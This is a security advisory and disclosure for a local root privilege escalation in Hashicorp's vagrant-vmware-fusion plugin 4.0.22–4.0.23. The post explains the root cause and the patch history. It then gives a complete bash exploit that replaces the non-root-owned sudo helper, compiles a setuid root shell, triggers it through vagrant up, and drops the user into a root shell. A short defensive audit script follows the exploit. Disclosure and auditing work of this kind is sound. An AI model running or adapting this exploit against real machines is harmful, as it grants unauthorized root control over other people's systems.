Hashicorp vagrant-vmware-fusion 4.0.23 - Local root Privilege Escalation
Source: https://m4.rkw.io/ Author: Wadham Published: 2017-12-06
# A couple of weeks ago I disclosed a local root privesc in Hashicorp's
# vagrant-vmware-fusion plugin:
#
# https://m4.rkw.io/blog/cve20177642-local-root-privesc-in-hashicorp-vagrantvmw...
#
# The initial patch they released was 4.0.21 which unfortunately contained a bug
# that prevented it from working at all on mac systems so I was unable to test it.
# I then had to give my mac to Apple for a couple of weeks for some repairs so
# only got around to testing 4.0.22 at the end of last week.
#
# Unfortunately, 4.0.22 is still exploitable and the subsequent release of 4.0.23
# did not fix the issue.  Hashicorp reacted much faster this time, taking only a
# few days to issue a patch instead of a few months and 4.0.24 does fix the issue.
#
# As discussed before the plugin installs a "sudo helper" encrypted ruby script
# and four architecture-specific wrappers into
# ~/.vagrant.d/gems/2.2.5/gems/vagrant-vmware-fusion-4.0.22/bin
#
# vagrant_vmware_desktop_sudo_helper
# vagrant_vmware_desktop_sudo_helper_wrapper_darwin_386
# vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64
# vagrant_vmware_desktop_sudo_helper_wrapper_linux_386
# vagrant_vmware_desktop_sudo_helper_wrapper_linux_amd64
#
# The wrapper that matches the system architecture will be made suid root the
# first time any vagrant box is up'd.  When a vagrant box is started the wrapper
# script elevates privileges and then executes the ruby sudo helper script.
#
# Previously I exploited the unsanitised system("ruby") call to simply invoke the
# wrapper directly and execute an arbitrary fake "ruby" script in the current PATH.
# This is now mitigated with 4.0.22 because the wrapper refuses to execute if it's
# not being called by vagrant.
#
# Unfortunately it's still possible to exploit it because the wrapper executes the
# sudo helper as root, and the sudo helper is not root-owned so we can overwrite it
# with any arbitrary ruby code which will then get executed as root when vagrant up
# is run.
#
# The issue was reported to Hashicorp on 27/07/17 and fixed on 01/08/17.
#
# This exploit requires a vmware_fusion box to be present on the system in order to
# work.  If you don't have one it may take a few minutes to download one.  Like
# last time it targets darwin 64bit but it's likely the other architectures are
# vulnerable too.
#
# https://m4.rkw.io/vagrant_vmware_privesc_4.0.23.sh.txt
# 81c2637cd1f4064c077aabc6fa7a3451ae3f2bd99c67f25c966728f88a89d5a1
# --------------------------------------------------------------------------
 
#!/bin/bash
echo
echo "****************************************************************"
echo "* Wooo vmware_fusion plugin 4.0.22-4.0.23 is still exploitable *"
echo "* m4rkw                                                        *"
echo "****************************************************************"
echo
echo "Shouts to #coolkids"
echo
 
vuln_bin=`find ~/.vagrant.d/ -name vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64 -perm +4000 |tail -n1`
target="/tmp/vagrant_vmware_privesc_4.0.23"
 
if [ "$vuln_bin" == "" ] ; then
  echo "Vulnerable binary not found."
  exit 1
fi
 
if [ -e "$target" ] ; then
  echo "Exploit payload already present."
  $target
  exit
fi
 
box=`vagrant box list |grep '(vmware_desktop' |head -n1 |cut -d ' ' -f1`
 
if [ "$box" == "" ] ; then
  echo "No vmware_fusion boxes found locally, we will have to download one."
  echo
  echo "This will take a few minutes."
  echo
  box="bento/ubuntu-16.04"
fi
 
dir=`dirname "$vuln_bin"`
 
cd "$dir"
 
if [ ! -e "vagrant_vmware_desktop_sudo_helper.bak" ] ; then
  mv vagrant_vmware_desktop_sudo_helper vagrant_vmware_desktop_sudo_helper.bak
fi
 
cat > $target.c <<EOF
#include <unistd.h>
int main()
{
  setuid(0);
  seteuid(0);
  execl("/bin/bash","bash","-c","/bin/bash;rm -f $target",NULL);
  return 0;
}
EOF
gcc -o $target $target.c
rm -f $target.c
 
cat > vagrant_vmware_desktop_sudo_helper <<EOF
#!/usr/bin/env ruby
\`chown root:wheel $target\`
\`chmod 4755 $target\`
EOF
 
chmod 755 vagrant_vmware_desktop_sudo_helper
 
cat > vagrantfile <<EOF
Vagrant.configure('2') do |config|
  config.vm.box = '$box'
end
EOF
 
vagrant up 2>/dev/null &
 
while :
do
  r=`ls -la $target |grep -- '-rwsr-xr-x  1 root  wheel'`
  if [ "$r" != "" ] ; then
    break
  fi
  sleep 0.2
done
 
killall -9 vagrant
 
echo
echo "Sorry Hashicorp.. still fail :P"
echo
 
sleep 1
cd
$target
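The root cause the advisory describes (a setuid-root wrapper that executes a helper script which is not root-owned, so the user can overwrite it) can be audited on a host with the check below. This is an added example, not part of the original exploit or of the plugin; it assumes the plugin bin directory layout listed above and uses only `find` primaries available on both macOS and GNU find.

```shell
#!/bin/bash
# Audit check (added example): for every setuid-root
# vagrant_vmware_desktop_sudo_helper_wrapper_* in DIR, verify that the
# vagrant_vmware_desktop_sudo_helper script it will run as root is owned by
# root and is not writable by group or other.
# Usage: audit_helper_dir DIR  -> prints findings; returns 0 if clean, 1 if not.

audit_helper_dir() {
  dir="$1"
  helper="$dir/vagrant_vmware_desktop_sudo_helper"
  status=0
  for w in "$dir"/vagrant_vmware_desktop_sudo_helper_wrapper_*; do
    [ -e "$w" ] || continue
    # Only a setuid wrapper can execute the helper as root, so skip the rest.
    [ -n "$(find "$w" -maxdepth 0 -perm -4000)" ] || continue
    echo "setuid wrapper: $w"
    if [ ! -e "$helper" ]; then
      echo "  FAIL: helper missing: $helper"
      status=1
      continue
    fi
    # The helper must be owned by root (uid 0) ...
    if [ -z "$(find "$helper" -maxdepth 0 -user root)" ]; then
      echo "  FAIL: $helper is not owned by root"
      status=1
    fi
    # ... and must not carry group (020) or other (002) write bits.
    if [ -n "$(find "$helper" -maxdepth 0 \( -perm -020 -o -perm -002 \))" ]; then
      echo "  FAIL: $helper is group/other-writable"
      status=1
    fi
  done
  return $status
}

# Run directly against a plugin bin directory when one is given on the command line,
# e.g. the 4.0.22 path from the advisory: ~/.vagrant.d/gems/2.2.5/gems/vagrant-vmware-fusion-4.0.22/bin
if [ -n "$1" ]; then
  audit_helper_dir "$1"
fi
```

A clean result means the wrapper's helper cannot be replaced by an unprivileged user; a FAIL line reproduces the condition the advisory relies on and the directory should be treated as needing the 4.0.24 update.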
 